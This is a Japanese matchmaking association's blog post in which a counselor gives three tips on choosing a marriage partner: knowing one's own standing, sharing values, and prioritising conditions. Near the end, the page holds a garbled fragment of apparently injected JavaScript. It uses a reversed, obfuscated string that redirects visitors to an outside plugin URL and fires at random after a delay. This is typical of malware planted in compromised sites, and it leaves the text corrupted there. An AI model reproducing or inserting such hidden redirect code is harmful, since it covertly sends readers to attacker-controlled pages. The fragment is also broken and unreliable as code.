婚活でお相手を選ぶ際のポイント (共通編)

婚活でお相手を選ぶ際のポイント (共通編)

協会カウンセラーの佐田です。

現在コロナ禍の影響によりパーティーなどのイベントへの参加も、躊躇してしまう方もいらっしゃるのではないかなと思います。
とはいえ、時間は残酷にもどんどん過ぎ去っていきますので、ここで足踏みせずに婚活に励んで欲しいなと思っております。


さて、今回は「婚活でお相手を選ぶ際のポイント(共通編)」を紹介したいと思います。

皆さんはお相手を選ぶ際に、どんな事を考えて選ばれてますか?
恐らく容姿などの外見や、価値観、年齢、年収、職業等、様々な要素を頭の中で浮かべながら、この辺の条件の人をと考えているかと思います。

昔はそれこそ仲人さんが何人かの候補を紹介して、その中から選ぶというのが主流でしたが、今はそれぞれの相談所で用意されている検索システムや、 マッチングアプリなどで、沢山あるお相手情報の中から気軽に条件設定してお相手を検索することができます。

これは本当に便利な機能で、自分の希望条件を入力して検索すれば、沢山のお相手情報が写真付きで表示してくれます。
簡単な操作で希望条件のお相手が沢山表示されると、人って面白いもので、「私(僕)からの申込みを待っていてくれている人がこんなにいるなんて!」と、錯覚に陥ってしまうのです。

そして意気揚々とお相手にお見合い申込をしても、返ってくるのは何故かお断りばかり・・。 「え・・どうして?」、「ひょっとしてたまたま合わなかっただけなのかな?」と深く考えずに同じ条件でお見合いを申込みし続け、気が付けば1件もお見合いが成立せずに年だけを重ねてしまうなんて事にもなりかねません。
このように簡単な操作で希望条件のお相手を探す事は、非常に便利で魅力的な反面、自分と合っていない希望条件で検索を続けてしまい、なかなかお見合いが成立しない「負の連鎖」にハマってしまいます。

このような負の連鎖にハマってしまわないためには、どのように気を付けていけば良いのか、3つのポイントとして簡単に紹介してきます。

ポイントその1. 自身の立ち位置を理解すること

お見合いを申込みする際に、最も気にしなければならないのが、婚活におけるご自身の価値(俗にいうスペック)です。
こう表現してしまうと、なんだ?人を商品か何かに例えるのか?とお叱りの声が聞こえてきますが、 残念ながらこう表現するのが一番分かりやすいかと思います。

ご自身の希望条件を満たした価値ある人も、同じように希望条件を満たした価値ある人を求めています。
申込みしたお見合いが成立するには、このお相手の希望条件をご自身が満たさなければなりません。
一見すると当たり前に思えるかもしれませんが、意外とこの部分を見落とされている方が多いなという印象です。

容姿や年齢、年収、職業等、お相手に対して好条件を求めるのであれば、当然それだけの好条件を持っているお相手が満足する 価値を持っていなければ、お見合いは成立しません。
そのお相手の条件を満たせる価値を持っているのか、もしくはこれからの自分磨きによって満たせることができるのか、お相手選びの際に今一度考えてみましょう。

ポイントその2. 価値観を共有できるお相手を選ぶ

どちらかというと、お見合い成立後のお話になるかと思いますが、価値観を共有できるって本当に大切だと思います。
日々生活をしていると、人は気づかない内に、色々とルールのような価値観を持つようになります。
例えば、早寝早起きは必ず守りたいとか、お店の定員さんにはため口を使うような横柄な態度をしないとか、部屋は常に綺麗に整頓していたいとか、 細かい事をあげればキリがないくらいマイ・ルールって存在すると思います。
恋人と同棲した経験をお持ちの方は特に実感されているかと思いますが、幾ら容姿や社会的ステータスが良い人でも、いざ一緒に生活してみると 細かい事で衝突を繰り返したり、ちょっとした言動の度に幻滅していては、とてもではないですが一緒に生活を続ける事なんてできません。

結婚生活とて同じことですので、価値観の共有がどれだけできるのか、これは婚活する上で非常に大切な事だと思います。
ただ、お見合い相手と結婚する前に同棲するというのは、なかなか難しいではないかと思いますので、まずは趣味や好みなど、簡単なものから共有できるものが どの程度あるのか、確認していくのがベターです。
友人がまさに価値観を共有できている身近な人の例で、共通の趣味や好みといった価値観が共有できる部分が多いからこそ友人となってくれていますので、私(僕)の価値観を共有できる人って例えばどんな人なんだろう? と疑問に思ったら、まずはご自身の友達を想像すると良いかもしれません。
とある有名なカウンセラーの方が仰っていた言葉で、「結婚相手は親友のような人を選べ」とありましたが、これは私もそう思います。

ポイントその3. お相手選びは希望条件100%合致ではなく、条件に優先順位を付けること

お相手選びの希望条件を考えると、「年齢は自分より年下」で、「容姿は年齢より若く」て、「共働きして欲しいから年収は〇〇万円以上」で、「仕事は〇〇関係」で、 「自分の休みが土日だから、お相手も土日」で、「子供が欲しいから家事、育児もしっかりやってくれる人」で・・・など、色々頭の中に浮かんでくるかと思いますが、 これらの条件を100%満たすお相手を探していると、該当する人がなかなか見つからないってことありませんか?
もし仮に100%満たすお相手が見つかったとしても、それだけの条件を満たすお相手なので当然ライバルが沢山いますし、お相手が持っている条件もそれ相応でしょうから、返事はお断り・・って事も十分ありえます。

もちろんはじめから好条件のお相手は諦めろと言いたいわけではありませんが、やはり好条件を沢山持っているお相手は、なかなか見つからない可能性もありますし、当然ライバルも多く、お相手の持っている条件も高いですしで、 お見合い成立するまで永遠と探さなければならなくなり、婚活そのものが進まなくなっていきます。

婚活は悲しいかな、時間が経過していく程厳しくなっていくところもありますので、時間を無駄にしないためにも、希望条件の中からこれだけは譲りたくないという優先条件を 2つ、3つ上げて、それを満たしてくれるお相手を選ぶことをオススメします。
もちろんポイントその1、その2にてご紹介した、「自身の立ち位置」や「価値観を共有できるお相手」を意識した方が、よりお見合い成立への角度が高く、その先へも進みやすいです。

以上、お相手選びのポイントとして、3つ紹介してきました。
内容によっては、気分が悪くなる部分もあったり、婚活そのものに幻滅したかもしれません。
しかし残念な事に、こういったポイントを無視して婚活を続けてしまうと、成婚までの道のりが、より遠く、より厳しいものになるかと思います。
成婚までの道のりをより確かなものにするためにも、これら3つのポイントを今一度考えながら、婚活を進めてみては如何でしょうか。

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to” data-full-width-responsive=”true”>
婚活パーティー続々開催中!

婚活パーティーの開催スケジュールについては、ぜひ当協会婚活イベント情報ページをご確認下さい。

婚活イベント情報を見る